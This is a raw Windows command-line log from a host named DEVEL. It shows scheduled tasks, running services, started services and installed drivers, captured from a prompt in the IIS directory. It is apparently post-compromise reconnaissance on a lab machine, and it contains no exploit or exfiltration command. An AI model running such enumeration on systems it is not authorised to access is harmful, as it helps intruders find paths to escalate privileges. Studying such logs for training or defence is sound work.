Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation
Start In:                             N/A
Comment:                              This task creates regular system protection points.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 1380 minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           12:00:00
Start Date:                           14/6/2005
End Date:                             N/A
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SystemRestore\SR
Next Run Time:                        15/9/2019 12:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation
Start In:                             N/A
Comment:                              This task creates regular system protection points.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 1380 minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Tcpip
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Tcpip\IpAddressConflict1
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem
Start In:                             N/A
Comment:                              This event is triggered when an IP address conflict is detected.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Tcpip\IpAddressConflict2
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem
Start In:                             N/A
Comment:                              This event is triggered when an IP address conflict is detected.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\TextServicesFramework
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\TextServicesFramework\MsCtfMonitor
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        28/12/2017 2:44:24
Last Result:                          0
Author:                               N/A
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              TextServicesFramework monitor task
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Time Synchronization
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Time Synchronization\SynchronizeTime
Next Run Time:                        15/9/2019 1:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 5:57:06
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\sc.exe start w32time task_started
Start In:                             N/A
Comment:                              Maintains date and time synchronization on all clients and servers in the network. If this service is stopped, date and time synchronization will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2005
End Date:                             N/A
Days:                                 SUN
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Windows Error Reporting
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Windows Error Reporting\QueueReporting
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        18/3/2017 1:08:40
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\wermgr.exe -queuereporting
Start In:                             N/A
Comment:                              Windows Error Reporting task to process queued reports.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Windows Filtering Platform
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange
Start In:                             N/A
Comment:                              This task adjusts the start type for firewall-triggered services when the start type of the Base Filtering Engine (BFE) is disabled.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Windows Media Sharing
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Windows Media Sharing\UpdateLibrary
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          "%ProgramFiles%\Windows Media Player\wmpnscfg.exe"
Start In:                             N/A
Comment:                              This task updates the cached list of folders and the security permissions on any new files in a user?s shared media library.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\WindowsBackup
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\WindowsBackup\ConfigNotification
Next Run Time:                        14/9/2019 10:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %systemroot%\System32\sdclt.exe /CONFIGNOTIFICATION
Start In:                             N/A
Comment:                              This scheduled task notifies the user that Windows Backup has not been configured.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           10:00:00
Start Date:                           24/3/2017
End Date:                             N/A
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\WindowsColorSystem
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\WindowsColorSystem\Calibration Loader
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        14/7/2009 7:54:01
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task applies color calibration settings.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\WindowsColorSystem\Calibration Loader
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        14/7/2009 7:54:01
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task applies color calibration settings.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows Defender
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows Defender\MP Scheduled Scan
Next Run Time:                        14/9/2019 3:11:42
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan
Start In:                             N/A
Comment:                              Scheduled Scan
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 1 minutes, If Not Idle Retry For 240 minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           3:11:42
Start Date:                           1/1/2000
End Date:                             1/1/2100
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

c:\windows\system32\inetsrv>tasklist /SVC
tasklist /SVC

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
smss.exe                       264 N/A
csrss.exe                      344 N/A
wininit.exe                    384 N/A
csrss.exe                      396 N/A
winlogon.exe                   452 N/A
services.exe                   488 N/A
lsass.exe                      496 SamSs
lsm.exe                        504 N/A
svchost.exe                    608 DcomLaunch, PlugPlay, Power
svchost.exe                    672 RpcEptMapper, RpcSs
svchost.exe                    724 Audiosrv, Dhcp, eventlog, lmhosts, wscsvc
LogonUI.exe                    792 N/A
svchost.exe                    832 AudioEndpointBuilder, CscService, SysMain,
                                   TrkWks, UxSms
svchost.exe                    888 AeLookupSvc, gpsvc, iphlpsvc, LanmanServer,
                                   ProfSvc, Schedule, SENS, Themes, Winmgmt,
                                   wuauserv
svchost.exe                   1000 EventSystem, netprofm, nsi, sppuinotify,
                                   W32Time, WdiServiceHost, WinHttpAutoProxySv
svchost.exe                   1072 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc
spoolsv.exe                   1184 Spooler
svchost.exe                   1220 BFE, DPS, MpsSvc
svchost.exe                   1320 AppHostSvc
svchost.exe                   1392 FDResPub
svchost.exe                   1424 ftpsvc
VGAuthService.exe             1512 VGAuthService
vmtoolsd.exe                  1540 VMTools
svchost.exe                   1572 W3SVC, WAS
WmiPrvSE.exe                  2020 N/A
msdtc.exe                     1632 MSDTC
sppsvc.exe                    2696 sppsvc
svchost.exe                   2736 WinDefend
SearchIndexer.exe             2816 WSearch
TrustedInstaller.exe          3948 TrustedInstaller
w3wp.exe                      2584 N/A
cmd.exe                       3928 N/A
conhost.exe                   1240 N/A
tasklist.exe                  1052 N/A

c:\windows\system32\inetsrv>net start
net start
These Windows services are started:

   Application Experience
   Application Host Helper Service
   Base Filtering Engine
   COM+ Event System
   Cryptographic Services
   DCOM Server Process Launcher
   Desktop Window Manager Session Manager
   DHCP Client
   Diagnostic Policy Service
   Diagnostic Service Host
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Function Discovery Resource Publication
   Group Policy Client
   IP Helper
   Microsoft FTP Service
   Network List Service
   Network Location Awareness
   Network Store Interface Service
   Offline Files
   Plug and Play
   Power
   Print Spooler
   Remote Procedure Call (RPC)
   RPC Endpoint Mapper
   Security Accounts Manager
   Security Center
   Server
   Software Protection
   SPP Notification Service
   Superfetch
   System Event Notification Service
   Task Scheduler
   TCP/IP NetBIOS Helper
   Themes
   User Profile Service
   VMware Alias Manager and Ticket Service
   VMware Tools
   Windows Audio
   Windows Audio Endpoint Builder
   Windows Defender
   Windows Event Log
   Windows Firewall
   Windows Management Instrumentation
   Windows Modules Installer
   Windows Process Activation Service
   Windows Search
   Windows Time
   Windows Update
   WinHTTP Web Proxy Auto-Discovery Service
   Workstation
   World Wide Web Publishing Service

The command completed successfully.


c:\windows\system32\inetsrv> DRIVERQUERY
 DRIVERQUERY

Module Name  Display Name           Driver Type   Link Date
============ ====================== ============= ======================
1394ohci     1394 OHCI Compliant Ho Kernel        14/7/2009 2:51:59
ACPI         Microsoft ACPI Driver  Kernel        14/7/2009 2:11:11
AcpiPmi      ACPI Power Meter Drive Kernel        14/7/2009 2:16:36
adp94xx      adp94xx                Kernel        6/12/2008 1:59:55
adpahci      adpahci                Kernel        1/5/2007 8:29:26
adpu320      adpu320                Kernel        28/2/2007 2:03:08
AFD          Ancillary Function Dri Kernel        14/7/2009 2:12:34
agp440       Intel AGP Bus Filter   Kernel        14/7/2009 2:25:36
aic78xx      aic78xx                Kernel        12/4/2006 3:20:11
aliide       aliide                 Kernel        14/7/2009 2:11:17
amdagp       AMD AGP Bus Filter Dri Kernel        14/7/2009 2:25:36
amdide       amdide                 Kernel        14/7/2009 2:11:19
AmdK8        AMD K8 Processor Drive Kernel        14/7/2009 2:11:03
AmdPPM       AMD Processor Driver   Kernel        14/7/2009 2:11:03
amdsata      amdsata                Kernel        19/5/2009 8:54:22
amdsbs       amdsbs                 Kernel        20/3/2009 8:35:26
amdxata      amdxata                Kernel        19/5/2009 8:57:35
AppID        AppID Driver           Kernel        14/7/2009 2:36:51
arc          arc                    Kernel        25/5/2007 12:31:06
arcsas       arcsas                 Kernel        14/1/2009 9:26:37
AsyncMac     RAS Asynchronous Media Kernel        14/7/2009 2:54:46
atapi        IDE Channel            Kernel        14/7/2009 2:11:15
b06bdrv      Broadcom NetXtreme II  Kernel        14/2/2009 12:10:59
b57nd60x     Broadcom NetXtreme Gig Kernel        26/4/2009 2:15:34
Beep         Beep                   Kernel        14/7/2009 2:45:00
blbdrive     blbdrive               Kernel        14/7/2009 2:23:04
bowser       Browser Support Driver File System   14/7/2009 2:14:21
BrFiltLo     Brother USB Mass-Stora Kernel        7/8/2006 12:33:45
BrFiltUp     Brother USB Mass-Stora Kernel        7/8/2006 12:33:45
Brserid      Brother MFC Serial Por Kernel        7/8/2006 12:33:50
BrSerWdm     Brother WDM Serial dri Kernel        7/8/2006 12:33:44
BrUsbMdm     Brother MFC USB Fax On Kernel        7/8/2006 12:33:43
BrUsbSer     Brother MFC USB Serial Kernel        9/8/2006 3:02:02
BTHMODEM     Bluetooth Serial Commu Kernel        14/7/2009 2:51:34
cdfs         CD/DVD File System Rea File System   14/7/2009 2:11:14
cdrom        CD-ROM Driver          Kernel        14/7/2009 2:11:24
circlass     Consumer IR Devices    Kernel        14/7/2009 2:51:17
CLFS         Common Log (CLFS)      Kernel        14/7/2009 2:11:10
CmBatt       Microsoft AC Adapter D Kernel        14/7/2009 2:19:18
cmdide       cmdide                 Kernel        14/7/2009 2:11:18
CNG          CNG                    Kernel        14/7/2009 2:32:55
Compbatt     Microsoft Composite Ba Kernel        14/7/2009 2:19:18
CompositeBus Composite Bus Enumerat Kernel        14/7/2009 2:45:26
crcdisk      Crcdisk Filter Driver  Kernel        14/7/2009 2:46:05
CSC          Offline Files Driver   Kernel        14/7/2009 2:15:08
DfsC         DFS Namespace Client D File System   14/7/2009 2:14:16
discache     System Attribute Cache Kernel        14/7/2009 2:24:04
Disk         Disk Driver            Kernel        14/7/2009 2:11:28
DXGKrnl      LDDM Graphics Subsyste Kernel        14/7/2009 2:26:15
E1G60        Intel(R) PRO/1000 NDIS Kernel        29/5/2008 2:14:11
ebdrv        Broadcom NetXtreme II  Kernel        31/12/2008 6:06:23
elxstor      elxstor                Kernel        4/2/2009 12:09:33
ErrDev       Microsoft Hardware Err Kernel        14/7/2009 2:19:18
exfat        exFAT File System Driv File System   14/7/2009 2:14:01
fastfat      FAT12/16/32 File Syste File System   14/7/2009 2:14:01
fdc          Floppy Disk Controller Kernel        14/7/2009 2:45:45
FileInfo     File Information FS Mi File System   14/7/2009 2:21:51
Filetrace    Filetrace              File System   14/7/2009 2:15:29
flpydisk     Floppy Disk Driver     Kernel        14/7/2009 2:45:45
FltMgr       FltMgr                 File System   14/7/2009 2:11:13
FsDepends    File System Dependency File System   14/7/2009 2:15:38
fvevol       Bitlocker Drive Encryp Kernel        14/7/2009 2:13:01
gagp30kx     Microsoft Generic AGPv Kernel        14/7/2009 2:25:42
hcw85cir     Hauppauge Consumer Inf Kernel        11/5/2009 10:22:41
HDAudBus     Microsoft UAA Bus Driv Kernel        14/7/2009 2:50:55
HidBatt      HID UPS Battery Driver Kernel        14/7/2009 2:19:21
HidBth       Microsoft Bluetooth HI Kernel        14/7/2009 2:51:33
HidIr        Microsoft Infrared HID Kernel        14/7/2009 2:51:04
HidUsb       Microsoft HID Class Dr Kernel        14/7/2009 2:51:04
HpSAMD       HpSAMD                 Kernel        19/5/2009 2:42:46
HTTP         HTTP                   Kernel        14/7/2009 2:12:53
hwpolicy     Hardware Policy Driver Kernel        14/7/2009 2:11:01
i8042prt     i8042 Keyboard and PS/ Kernel        14/7/2009 2:11:23
iaStorV      iaStorV                Kernel        8/4/2009 7:54:58
iirsp        iirsp                  Kernel        13/12/2005 11:48:01
intelide     intelide               Kernel        14/7/2009 2:11:19
intelppm     Intel Processor Driver Kernel        14/7/2009 2:11:03
IpFilterDriv IP Traffic Filter Driv Kernel        14/7/2009 2:54:28
IPMIDRV      IPMIDRV                Kernel        14/7/2009 2:30:59
IPNAT        IP Network Address Tra Kernel        14/7/2009 2:54:28
IRENUM       IR Bus Enumerator      Kernel        14/7/2009 2:53:27
isapnp       isapnp                 Kernel        14/7/2009 2:19:29
iScsiPrt     iScsiPort Driver       Kernel        14/7/2009 2:46:21
kbdclass     Keyboard Class Driver  Kernel        14/7/2009 2:11:15
kbdhid       Keyboard HID Driver    Kernel        14/7/2009 2:45:09
KSecDD       KSecDD                 Kernel        14/7/2009 2:11:56
KSecPkg      KSecPkg                Kernel        14/7/2009 2:34:00
lltdio       Link-Layer Topology Di Kernel        14/7/2009 2:53:18
LSI_FC       LSI_FC                 Kernel        10/12/2008 12:28:47
LSI_SAS      LSI_SAS                Kernel        19/5/2009 3:19:55
LSI_SAS2     LSI_SAS2               Kernel        19/5/2009 3:31:29
LSI_SCSI     LSI_SCSI               Kernel        17/4/2009 1:14:47
luafv        UAC File Virtualizatio File System   14/7/2009 2:15:44
megasas      megasas                Kernel        19/5/2009 4:09:36
MegaSR       MegaSR                 Kernel        19/5/2009 4:25:17
Modem        Modem                  Kernel        14/7/2009 2:55:24
monitor      Microsoft Monitor Clas Kernel        14/7/2009 2:25:58
mouclass     Mouse Class Driver     Kernel        14/7/2009 2:11:15
mouhid       Mouse HID Driver       Kernel        14/7/2009 2:45:08
mountmgr     Mount Point Manager    Kernel        14/7/2009 2:11:27
mpio         mpio                   Kernel        14/7/2009 2:46:13
mpsdrv       Windows Firewall Autho Kernel        14/7/2009 2:52:52
MRxDAV       WebDav Client Redirect File System   14/7/2009 2:14:25
mrxsmb       SMB MiniRedirector Wra File System   14/7/2009 2:14:24
mrxsmb10     SMB 1.x MiniRedirector File System   14/7/2009 2:14:34
mrxsmb20     SMB 2.0 MiniRedirector File System   14/7/2009 2:14:29
msahci       msahci                 Kernel        14/7/2009 2:45:50
msdsm        msdsm                  Kernel        14/7/2009 2:46:19
Msfs         Msfs                   File System   14/7/2009 2:11:26
mshidkmdf    Pass-through HID to KM Kernel        14/7/2009 2:51:07
msisadrv     msisadrv               Kernel        14/7/2009 2:11:09
MsRPC        MsRPC                  Kernel        14/7/2009 2:11:59
mssmbios     Microsoft System Manag Kernel        14/7/2009 2:19:25
MTConfig     Microsoft Input Config Kernel        14/7/2009 2:46:55
Mup          Mup                    File System   14/7/2009 2:14:14
NativeWifiP  NativeWiFi Filter      Kernel        14/7/2009 2:51:59
NDIS         NDIS System Driver     Kernel        14/7/2009 2:12:24
NdisCap      NDIS Capture LightWeig Kernel        14/7/2009 2:52:44
NdisTapi     Remote Access NDIS TAP Kernel        14/7/2009 2:54:24
Ndisuio      NDIS Usermode I/O Prot Kernel        14/7/2009 2:53:51
NdisWan      Remote Access NDIS WAN Kernel        14/7/2009 2:54:34
NDProxy      NDIS Proxy             Kernel        14/7/2009 2:54:27
NetBIOS      NetBIOS Interface      File System   14/7/2009 2:53:54
NetBT        NetBT                  Kernel        14/7/2009 2:12:18
nfrd960      nfrd960                Kernel        7/6/2006 12:12:15
Npfs         Npfs                   File System   14/7/2009 2:11:31
nsiproxy     NSI proxy service driv Kernel        14/7/2009 2:12:08
Ntfs         Ntfs                   File System   14/7/2009 2:12:05
Null         Null                   Kernel        14/7/2009 2:11:12
nvraid       nvraid                 Kernel        20/5/2009 9:43:36
nvstor       nvstor                 Kernel        20/5/2009 9:44:09
nv_agp       NVIDIA nForce AGP Bus  Kernel        14/7/2009 2:25:50
ohci1394     1394 OHCI Compliant Ho Kernel        14/7/2009 2:51:29
Parport      Parallel port driver   Kernel        14/7/2009 2:45:34
partmgr      Partition Manager      Kernel        14/7/2009 2:11:35
Parvdm       Parvdm                 Kernel        14/7/2009 2:45:29
pci          PCI Bus Driver         Kernel        14/7/2009 2:11:16
pciide       pciide                 Kernel        14/7/2009 2:11:19
pcmcia       pcmcia                 Kernel        14/7/2009 2:19:29
pcw          Performance Counters f Kernel        14/7/2009 2:11:10
PEAUTH       PEAUTH                 Kernel        14/7/2009 3:35:44
PptpMiniport WAN Miniport (PPTP)    Kernel        14/7/2009 2:54:47
Processor    Processor Driver       Kernel        14/7/2009 2:11:03
Psched       QoS Packet Scheduler   Kernel        14/7/2009 2:53:58
pvscsi       pvscsi Storage Control Kernel        26/1/2016 1:15:17
ql2300       ql2300                 Kernel        23/1/2009 1:28:52
ql40xx       ql40xx                 Kernel        19/5/2009 4:17:31
RasAcd       Remote Access Auto Con Kernel        14/7/2009 2:54:40
RasAgileVpn  WAN Miniport (IKEv2)   Kernel        14/7/2009 2:55:00
Rasl2tp      WAN Miniport (L2TP)    Kernel        14/7/2009 2:54:33
RasPppoe     Remote Access PPPOE Dr Kernel        14/7/2009 2:54:53
RasSstp      WAN Miniport (SSTP)    Kernel        14/7/2009 2:54:57
rdbss        Redirected Buffering S File System   14/7/2009 2:14:26
rdpbus       Remote Desktop Device  Kernel        14/7/2009 3:02:40
RDPCDD       RDPCDD                 Kernel        14/7/2009 3:01:40
RDPDR        Terminal Server Device Kernel        14/7/2009 3:02:56
RDPENCDD     RDP Encoder Mirror Dri Kernel        14/7/2009 3:01:39
RDPREFMP     Reflector Display Driv Kernel        14/7/2009 3:01:41
RDPWD        RDP Winstation Driver  Kernel        14/7/2009 3:01:50
rdyboost     ReadyBoost             Kernel        14/7/2009 2:22:02
rspndr       Link-Layer Topology Di Kernel        14/7/2009 2:53:20
s3cap        s3cap                  Kernel        14/7/2009 2:28:46
sbp2port     sbp2port               Kernel        14/7/2009 2:11:28
scfilter     Smart card PnP Class F Kernel        14/7/2009 2:33:50
Serenum      Serenum Filter Driver  Kernel        14/7/2009 2:45:27
Serial       Serial Port Driver     Kernel        14/7/2009 2:45:33
sermouse     Serial Mouse Driver    Kernel        14/7/2009 2:45:08
sffdisk      SFF Storage Class Driv Kernel        14/7/2009 2:45:52
sffp_mmc     SFF Storage Protocol D Kernel        14/7/2009 2:45:52
sffp_sd      SFF Storage Protocol D Kernel        14/7/2009 2:45:51
sfloppy      High-Capacity Floppy D Kernel        14/7/2009 2:45:52
sisagp       SIS AGP Bus Filter     Kernel        14/7/2009 2:25:35
SiSRaid2     SiSRaid2               Kernel        24/9/2008 9:19:45
SiSRaid4     SiSRaid4               Kernel        2/10/2008 12:52:22
Smb          Message-oriented TCP/I Kernel        14/7/2009 2:53:39
spldr        Security Processor Loa Kernel        11/5/2009 7:13:47
srv          Server SMB 1.xxx Drive File System   14/7/2009 2:15:10
srv2         Server SMB 2.xxx Drive File System   14/7/2009 2:14:52
srvnet       srvnet                 File System   14/7/2009 2:14:45
stexstor     stexstor               Kernel        18/2/2009 1:03:21
storflt      Disk Virtual Machine B Kernel        14/7/2009 2:28:44
storvsc      storvsc                Kernel        14/7/2009 2:28:44
swenum       Software Bus Driver    Kernel        14/7/2009 2:45:08
Tcpip        TCP/IP Protocol Driver Kernel        14/7/2009 2:13:18
TCPIP6       Microsoft IPv6 Protoco Kernel        14/7/2009 2:13:18
tcpipreg     TCP/IP Registry Compat Kernel        14/7/2009 2:54:14
TDPIPE       TDPIPE                 Kernel        14/7/2009 3:01:36
TDTCP        TDTCP                  Kernel        14/7/2009 3:01:37
tdx          NetIO Legacy TDI Suppo Kernel        14/7/2009 2:12:10
TermDD       Terminal Device Driver Kernel        14/7/2009 3:01:35
tssecsrv     Remote Desktop Service Kernel        14/7/2009 3:01:50
tunnel       Microsoft Tunnel Minip Kernel        14/7/2009 2:54:03
uagp35       Microsoft AGPv3.5 Filt Kernel        14/7/2009 2:25:40
udfs         udfs                   File System   14/7/2009 2:14:09
uliagpkx     Uli AGP Bus Filter     Kernel        14/7/2009 2:25:47
umbus        UMBus Enumerator Drive Kernel        14/7/2009 2:51:38
UmPass       Microsoft UMPass Drive Kernel        14/7/2009 2:51:35
usbccgp      Microsoft USB Generic  Kernel        14/7/2009 2:51:31
usbcir       eHome Infrared Receive Kernel        14/7/2009 2:51:18
usbehci      Microsoft USB 2.0 Enha Kernel        14/7/2009 2:51:14
usbhub       Microsoft USB Standard Kernel        14/7/2009 2:52:06
usbohci      Microsoft USB Open Hos Kernel        14/7/2009 2:51:14
usbprint     Microsoft USB PRINTER  Kernel        14/7/2009 3:17:06
USBSTOR      USB Mass Storage Drive Kernel        14/7/2009 2:51:19
usbuhci      Microsoft USB Universa Kernel        14/7/2009 2:51:10
vdrvroot     Microsoft Virtual Driv Kernel        14/7/2009 2:46:19
vga          vga                    Kernel        14/7/2009 2:25:49
VgaSave      VgaSave                Kernel        14/7/2009 2:25:50
vhdmp        vhdmp                  Kernel        14/7/2009 2:46:25
viaagp       VIA AGP Bus Filter     Kernel        14/7/2009 2:25:39
ViaC7        VIA C7 Processor Drive Kernel        14/7/2009 2:11:03
viaide       viaide                 Kernel        14/7/2009 2:11:20
vm3dmp       vm3dmp                 Kernel        14/12/2016 12:32:48
vmbus        Virtual Machine Bus    Kernel        14/7/2009 2:28:53
VMBusHID     VMBusHID               Kernel        14/7/2009 2:28:45
vmci         VMware VMCI Bus Driver Kernel        4/6/2016 11:06:29
VMMemCtl     Memory Control Driver  Kernel        5/3/2016 1:15:45
vmmouse      VMware Pointing Device Kernel        20/2/2016 1:14:08
